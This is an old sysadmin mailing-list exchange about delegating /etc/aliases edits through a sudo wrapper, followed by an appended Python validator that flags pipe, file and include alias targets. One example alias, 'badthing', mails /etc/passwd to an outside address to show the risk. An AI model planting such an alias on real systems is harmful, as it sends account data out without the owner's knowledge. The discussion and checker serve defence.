hi joshua...
/etc/aliases... what can we do with it...
i don't know if this was bill's original intent or not
but let's see what can (regular) people do with /etc/aliases
/etc/aliases
badthing: mail -s send me the passwd [EMAIL PROTECTED] \
/etc/passwd
but since the persons allowed to edit the /etc/aliases file are internal
anyway .. don't think we have to worry about that kind of stuff
if the company is 500 people with people leaving and coming onboard
and if there are jr admins... let them add/delete the people
from all or sales or engineering or managers etc...
- in this case ..the sudo wrapper/editor script is good
and the script can also propagate the /etc/aliases file to
each machine that needs to have the aliases file kept current
root@Slaves # sucpaliases -scp
where it does ( and only if it's out-of-date )
scp MasterCopy:/etc/aliases /etc ; newaliases
the wrapper script can also do the diff and/or run newaliases
depending on your level of paranoia of the ones allowed to run
this sudo alias script
- nothing happens till *you* run newaliases...which i would
do myself if i was responsible... but i'd do a diff between
the new one and the previously tested/good version
have fun linuxing
alvin
On Fri, 30 Nov 2001, Joshua Goodall wrote:
That is a fair point but addressable with post-editing checks
in the wrapper. Of course, one is exceedingly vulnerable to
race conditions if one is not very careful about what is read and
when.
You don't have to use vi; there are dumber editors in the world.
Maybe you should just have some programmatic (i.e. commandline,
not full-screen) editing program for aliases that's callable from sudo.
However the whole idea fills me with worry; /etc/aliases IS quite a critical
file and I'm certain that specific attacks could be engineered
against you if write access was obtained.
Why not just have users make their changes and mail a diff to
the sysadmin for approval :)
J
p.s. failing that, investigate LIDS; but that's a different ball game.
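An added example, not part of either message: one way a sudo wrapper could do the post-editing check discussed above, flagging alias targets that pipe to a program, write to a file, or pull in an include file, and installing exactly the bytes it checked so the file cannot change between check and install. The function names, the sample entries and the choice to reject these target forms outright are assumptions for illustration.

```python
import os
import re
import tempfile

# Target prefixes that make an alias do more than forward mail.
RISKY = {"|": "pipe to program", "/": "delivery to file", ":include:": "include file"}

# Constructed sample input, not taken from a real system.
SAMPLE = ('sales: alice, bob,\n    carol\n'
          'badthing: "| /usr/local/bin/handler"\n'
          'all: :include:/etc/mail/all.list\n')

def logical_lines(text):
    """Join continuation lines (leading whitespace); drop comments and blanks."""
    out = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and out:
            out[-1] += " " + raw.strip()
        else:
            out.append(raw.strip())
    return out

def risky_targets(text):
    """Return (alias, target, reason) for each target that is not a plain address."""
    findings = []
    for line in logical_lines(text):
        name, _, rhs = line.partition(":")
        for tok in re.findall(r'\s*("[^"]*"|[^,]+)', rhs):  # keep quoted targets whole
            target = tok.strip().strip('"').strip()
            for prefix, reason in RISKY.items():
                if target.startswith(prefix):
                    findings.append((name.strip(), target, reason))
    return findings

def install_if_safe(candidate, dest):
    """Read the edited copy once, check those bytes, install the same bytes."""
    with open(candidate, "rb") as fh:
        data = fh.read()
    findings = risky_targets(data.decode("utf-8", "replace"))
    if findings:
        return findings            # refuse: dest is left untouched
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(dest)))
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(tmp, 0o644)           # mkstemp creates the file 0600
    os.replace(tmp, dest)          # atomic swap; run newaliases after this
    return []
```

The wrapper would run newaliases only when `install_if_safe` returns an empty list, and would show the findings to the admin otherwise.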